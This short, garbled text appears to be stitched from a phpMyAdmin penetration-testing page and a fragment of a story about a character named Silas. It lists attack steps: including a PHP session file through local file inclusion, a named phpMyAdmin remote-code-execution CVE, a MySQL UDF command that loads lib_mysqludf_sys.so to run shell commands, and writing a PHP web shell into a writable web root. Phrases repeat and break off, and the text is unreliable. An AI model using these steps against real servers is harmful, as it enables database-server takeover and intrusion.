Silas went back to the SQL execution tab (accessible even without a full login in some misconfigured setups) and ran: SELECT '';
Use the LFI to include /var/lib/php/sessions/sess_[YOUR_ID] . C. CVE-2016-5734 (RCE via Preg_Replace) phpmyadmin hacktricks verified
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('id'); Silas went back to the SQL execution tab
If the web root is writable, an attacker can write a PHP shell and access it via browser. If the web root is writable
